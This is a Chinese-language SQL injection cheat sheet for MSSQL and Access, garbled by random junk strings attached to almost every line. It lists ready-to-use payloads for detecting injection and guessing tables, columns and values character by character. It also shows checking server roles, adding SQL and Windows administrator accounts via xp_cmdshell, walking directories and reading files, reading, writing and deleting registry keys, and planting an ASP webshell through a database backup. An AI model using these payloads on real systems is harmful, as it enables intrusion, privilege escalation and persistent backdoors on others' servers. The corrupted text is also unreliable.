1.判断是否有注入;and 1=1 ;and 1=2 (F~eknJ
2.初步判断是否是mssql ;and user>0 z2S53^C*
3fn6W)v?
3.注入参数是字符'and [查询条件] and ''=' 's!EAqCN
]D%D:>9|/
4.搜索时没过滤参数的'and [查询条件] and '%25'=' <-X)<k
u!X[xe;
5.判断数据库系统 ]%F3 xzOk
0t6s20*q
;and (select count(*) from sysobjects)>0 mssql GP[;+xMBh
(m~MyT#S
;and (select count(*) from msysobjects)>0 access ub./U@1
cM.q^{d`
~@MIG
[Gy sx
6.猜数据库 ;and (select Count(*) from [数据库名])>0 =-`X61];M
\Qz>us=G
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Cm(Hu
V'\4sPt
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 a'XCT@B
_sJp"4?
9.(1)猜字段的ascii值(access) %UY=VE\F
]:Ocu--
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 J1P82=$,
{Km|SG[-q
(2)猜字段的ascii值(mssql) XR]]g+Z
.lTU[(qwu
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 +TA(crD
,Ix7Yg[
10.测试权限结构(mssql) %\%1EZQ%
<iv9Mg}
$l-j(=Md
Oa
CkU
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- E^T/Qu
U/wY;7{)#
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- dV.)+X7<
[}}oHm3&
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- \D>'
WcbJ4Ore
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- SQW A{f
~iydp
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- N@Bqe{r6j
;@
%~eIlu
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- l4v)tV~
y/4 4((O
;and 1=(select IS_MEMBER('db_owner'));-- $bD 3
;x|4Tm
Js'COO
/Y|9!{.
11.添加mssql和系统的帐户 GcHWalm
/QD}_lh;,
;exec master.dbo.sp_addlogin username;-- nU||Jg
;exec master.dbo.sp_password null,username,password;-- DZ(e^vq
X}h{xl
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- [&3G `8hY
f+1)Ju~
;exec master.dbo.xp_cmdshell 'net user username password #^%Rk'W
/,$6`V
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- E':y3T@."
g6;O)b
;exec master.dbo.xp_cmdshell 'net user username password /add';-- pG:FDlR~
>x(^g~i
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- rQ@,Y"
nRb#M
6pxj9@X+
S!up2OseW
12.(1)遍历目录 2p(K0PtX
OBF5Tl4
;create table dirs(paths varchar(100), id int) oC>^V5
\Vr(P>
;insert dirs exec master.dbo.xp_dirtree 'c:\' L}lc=\
c]t=#
;and (select top 1 paths from dirs)>0 +q1
@8
}eULcgRG
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) !@%m3)T8
e
J2wK3R
b6R0za
.#lQZo6$\|
(2)遍历目录 x]Nq|XK
hdfNXZ{A"
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- D@7\Fg
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 @1^iWM j
gy_n=jhi+
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 d+ql@e ]
/$/\$f$
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 xa5I{<<U
D.)R8X
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ,hYUxh45
^A;v|U
b"/P
)u(`s `zd
13.mssql中的存储过程 HVh+Zk
mY
|$=n5X
xp_regenumvalues 注册表根键, 子键 zA\DI]:+
%(,JBa:G
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 <?2[]h:wp
s{Ryh.IyI
xp_regread 根键,子键,键值名 Y]^[|e8
57%:0loW
;exec xp_regread wvBJ?t,
!H~G_?Mf\O
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Q~ te`
h8$lDFo
xp_regwrite 根键,子键, 值名, 值类型, 值 DLJu%5F
rP^2MH"
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 zG+oZ
&NB[:S=
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Ag#p )
:&9#p%/
xp_regdeletevalue 根键,子键,值名 N=)N
y*2:(nI
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 KR?-<
(VU: &.
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ;~tKNytD`B
dHg[0Br)r
SI4M<'fK
o%RyE]pw,
14.mssql的backup创建webshell G\ru%
v>;6pcp[F
use model J XbG|L
) zz"DH
create table cmd(str image); Jd7+~isu~
NIQNzq?a^
insert into cmd(str) values (''); bTb|@
8! pfy"
backup database model to disk='c:\l.asp'; nH/V2>Lm
1vx:`2 A4
9p9:nx\
|J?KHI
15.mssql内置函数 cK1r9ED|
vRVQ:fw
;and (select @@version)>0 获得Windows的版本号 H+;>>|+:~
#q6jE
;and user_name()='dbo' 判断当前系统的连接用户是不是sa _ ?xORzO
? R#-gvX%
;and (select user_name())>0 爆当前系统的连接用户 R*'rg-d
!%_}Rv!JT
;and (select db_name())>0 得到当前连接的数据库 !J3g, p*
sJw#^l
CM!bD\5
=M*31>"I0
16.简洁的webshell E}b"
qOV
>
CZ|Vx
use model :-69,e
9]xOuCb
create table cmd(str image); /MosE,7l
k-*H=km
insert into cmd(str) values (''); )xoI H{
Kj;Q;Ii
backup database model to disk='g:\wwwtest\l.asp';